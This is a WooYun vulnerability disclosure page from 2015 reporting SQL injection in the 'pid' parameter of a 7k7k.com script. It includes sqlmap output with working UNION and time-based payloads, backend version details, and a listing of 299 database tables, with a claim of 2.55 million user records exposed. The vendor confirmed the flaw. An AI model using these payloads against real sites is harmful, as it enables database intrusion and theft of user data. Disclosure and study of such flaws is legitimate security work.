当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0112110
漏洞标题:
奇客星空某站存在SQL注入
相关厂商:
奇客星空
漏洞作者:
深度安全实验室
提交时间:
2015-05-05 10:05
修复时间:
2015-06-19 16:12
公开时间:
2015-06-19 16:12
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
15
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-05-05: 细节已通知厂商并且等待厂商处理中
2015-05-05: 厂商已经确认,细节仅向厂商公开
2015-05-15: 细节向核心白帽子及相关领域专家公开
2015-05-25: 细节向普通白帽子公开
2015-06-04: 细节向实习白帽子公开
2015-06-19: 细节向公众公开

简要描述:

详细说明:

http://web.7k7k.com/codes/get.php?pid=1

存在SQL注入

110.png

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: pid
    Type: UNION query
    Title: MySQL UNION query (NULL) - 15 columns
    Payload: pid=-5775 UNION ALL SELECT CONCAT(0x7175766771,0x4d51425a564641485579,0x7176776f71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: pid=1 AND SLEEP(5)
---
web application technology: Apache, PHP 5.3.6
back-end DBMS: MySQL 5.0.11
Database: web7k
[299 tables]
+--------------------------+
| admin_menu               |
| admin_user               |
| admin_user_role          |
| baidu_keywordid          |
| baidu_keywordid_days     |
| baidu_sync_log           |
| baidu_union              |
| baidu_wm_days            |
| gs_admin                 |
| gs_admin_group           |
| gs_admin_menu            |
| gs_charge                |
| gs_charge_info           |
| keyword                  |
| keywordid_week           |
| kk_card_detail           |
| kk_dealer                |
| level_award              |
| sogou_keywordid_days     |
| sogou_sync_log           |
| stat_adv_total           |
| stat_money_log           |
| stat_plan_category       |
| testforid                |
| uc_265g                  |
| uc_7k7kb                 |
| uc_7kblogs               |
| uc_7kcharge              |
| uc_addnum                |
| uc_admin_logs            |
| uc_adminlog              |
| uc_adusers               |
| uc_adv_category          |
| uc_advert                |
| uc_ahsgchoujiang         |
| uc_ahsghd                |
| uc_amtcount              |
| uc_antecode              |
| uc_antevote              |
| uc_article               |
| uc_asztchoujiang         |
| uc_authogroup            |
| uc_authority             |
| uc_authormenu            |
| uc_base                  |
| uc_binduser              |
| uc_bulian                |
| uc_buykk                 |
| uc_cardpay               |
| uc_charge                |
| uc_charge2011            |
| uc_charge_kkm            |
| uc_chargeadduser         |
| uc_chargefrom            |
| uc_chargesale            |
| uc_chengzi               |
| uc_city                  |
| uc_class                 |
| uc_code                  |
| uc_codecate              |
| uc_contactkf             |
| uc_coop                  |
| uc_cps_account           |
| uc_cps_confirm           |
| uc_cps_rate              |
| uc_cps_subuser           |
| uc_cpskou                |
| uc_cpslist               |
| uc_cpssite               |
| uc_cpsuser               |
| uc_cqbyhd                |
| uc_cqbynumber            |
| uc_csbhchoujiang         |
| uc_csbhhd                |
| uc_csbhhdqd              |
| uc_csbhma                |
| uc_csbhrecord            |
| uc_ddtchoujiang          |
| uc_demouser              |
| uc_dlqhd                 |
| uc_docochoujiang         |
| uc_docohd                |
| uc_downact               |
| uc_downloads             |
| uc_factions              |
| uc_fcm                   |
| uc_fours                 |
| uc_fuchi                 |
| uc_gamecode              |
| uc_gamecodeqxz           |
| uc_gameindex             |
| uc_games                 |
| uc_getaszt               |
| uc_gethzw                |
| uc_getuser               |
| uc_gwactive              |
| uc_hdlog                 |
| uc_hits                  |
| uc_hits_hours            |
| uc_hzwchoujiang3         |
| uc_hzwhd01               |
| uc_hzwhd03               |
| uc_hzwquestion           |
| uc_indexshow             |
| uc_information           |
| uc_integral_log          |
| uc_jinjiang              |
| uc_jjsgchoujiang         |
| uc_jjsghd                |
| uc_kanswer               |
| uc_kdxyma                |
| uc_kefu_question         |
| uc_kefu_question_rookie  |
| uc_kefu_rookie           |
| uc_kefu_rookie_answer    |
| uc_kefu_rookie_sh        |
| uc_kefu_rookie_sh_answer |
| uc_kefu_vip              |
| uc_kefu_vip_answer       |
| uc_kkhuodong             |
| uc_kkmao                 |
| uc_kquestion             |
| uc_ktpd2choujiang        |
| uc_ktpd2hd               |
| uc_leftserverlist        |
| uc_levelcharge           |
| uc_levelset              |
| uc_lhzschoujiang         |
| uc_lhzschoujiang2        |
| uc_lhzshd                |
| uc_lhzshd2               |
| uc_lhzsmtk               |
| uc_loginlog              |
| uc_makeReg               |
| uc_makeWDReg             |
| uc_mediabelong           |
| uc_mediakeywords         |
| uc_mediapic              |
| uc_mgames                |
| uc_mhit                  |
| uc_mthreads              |
| uc_nc                    |
| uc_nslmchoujiang         |
| uc_nslmhd                |
| uc_other                 |
| uc_package               |
| uc_package_code          |
| uc_pageshow              |
| uc_passlogs              |
| uc_paypal                |
| uc_paypalcharge          |
| uc_pf                    |
| uc_pkddt                 |
| uc_pkddtuser             |
| uc_pksupport             |
| uc_playgame              |
| uc_points                |
| uc_points_record         |
| uc_polling               |
| uc_polls                 |
| uc_pwdappeal             |
| uc_qq                    |
| uc_question              |
| uc_qxzchoujiang          |
| uc_qxzhd                 |
| uc_regFour               |
| uc_sctxchoujiang         |
| uc_sctxhd                |
| uc_seoset                |
| uc_servers               |
| uc_settlement            |
| uc_sign                  |
| uc_site                  |
| uc_sitepos               |
| uc_sjsgchoujiang         |
| uc_sjsghd                |
| uc_smallpic              |
| uc_sq_tuijiangame        |
| uc_sqchoujiang           |
| uc_sqhd                  |
| uc_sssghd                |
| uc_subinfo               |
| uc_sw                    |
| uc_swhours               |
| uc_tg360                 |
| uc_tgarticle             |
| uc_tgbdnew               |
| uc_tgcategory            |
| uc_tgconfig              |
| uc_tghao123              |
| uc_tghao123new           |
| uc_tghao4                |
| uc_tghao5                |
| uc_tgmedia_image         |
| uc_tgmedia_size          |
| uc_tgmedia_type          |
| uc_tgpage                |
| uc_tgpage2               |
| uc_tgpage2345            |
| uc_tgpagehao123          |
| uc_tgpagehao123bak       |
| uc_tgreg_page            |
| uc_tgsgnew               |
| uc_tgslides              |
| uc_tgsynew               |
| uc_tgxfnew               |
| uc_threads               |
| uc_tjaid                 |
| uc_tjaid2012             |
| uc_tjcount               |
| uc_tjcpskou              |
| uc_tjday                 |
| uc_tjdayold              |
| uc_tjfrom                |
| uc_tjgame                |
| uc_tjhours               |
| uc_tjmonthcount          |
| uc_tjwdday               |
| uc_tmpuser               |
| uc_totalPay2011          |
| uc_totalPay2012          |
| uc_touchchoujiang        |
| uc_touchfztp             |
| uc_touchfztppl           |
| uc_touchhd               |
| uc_touchinfo             |
| uc_touchpiao             |
| uc_touchsign             |
| uc_touchypcj             |
| uc_touchypcj_tp          |
| uc_union_day             |
| uc_union_hours           |
| uc_upload                |
| uc_upload1               |
| uc_user0                 |
| uc_user1                 |
| uc_user10                |
| uc_user11                |
| uc_user12                |
| uc_user13                |
| uc_user14                |
| uc_user15                |
| uc_user16                |
| uc_user17                |
| uc_user18                |
| uc_user19                |
| uc_user2                 |
| uc_user20                |
| uc_user21                |
| uc_user22                |
| uc_user23                |
| uc_user24                |
| uc_user25                |
| uc_user26                |
| uc_user27                |
| uc_user28                |
| uc_user29                |
| uc_user3                 |
| uc_user30                |
| uc_user31                |
| uc_user32                |
| uc_user33                |
| uc_user34                |
| uc_user35                |
| uc_user36                |
| uc_user37                |
| uc_user38                |
| uc_user39                |
| uc_user4                 |
| uc_user40                |
| uc_user41                |
| uc_user42                |
| uc_user43                |
| uc_user44                |
| uc_user45                |
| uc_user46                |
| uc_user47                |
| uc_user48                |
| uc_user49                |
| uc_user5                 |
| uc_user6                 |
| uc_user7                 |
| uc_user8                 |
| uc_user9                 |
| uc_userlog               |
| uc_vip                   |
| uc_vip_users             |
| uc_vipuser               |
| uc_wbcs                  |
| uc_webmaster             |
| uc_wltemp                |
| uc_wycqpwd               |
| uc_xinshu                |
| uc_xinshu_bzzr           |
| uc_xinshu_cqby           |
| uc_xinshu_login          |
| uc_xinshu_mycs           |
| uc_xinshu_rxtl           |
| uc_zhixiao               |
+--------------------------+

255万用户数据

102.png

103.png

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云

>

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-05-05 16:10

厂商回复:

感谢白帽子反馈。已通知相关技术人员处理。

最新状态:

暂无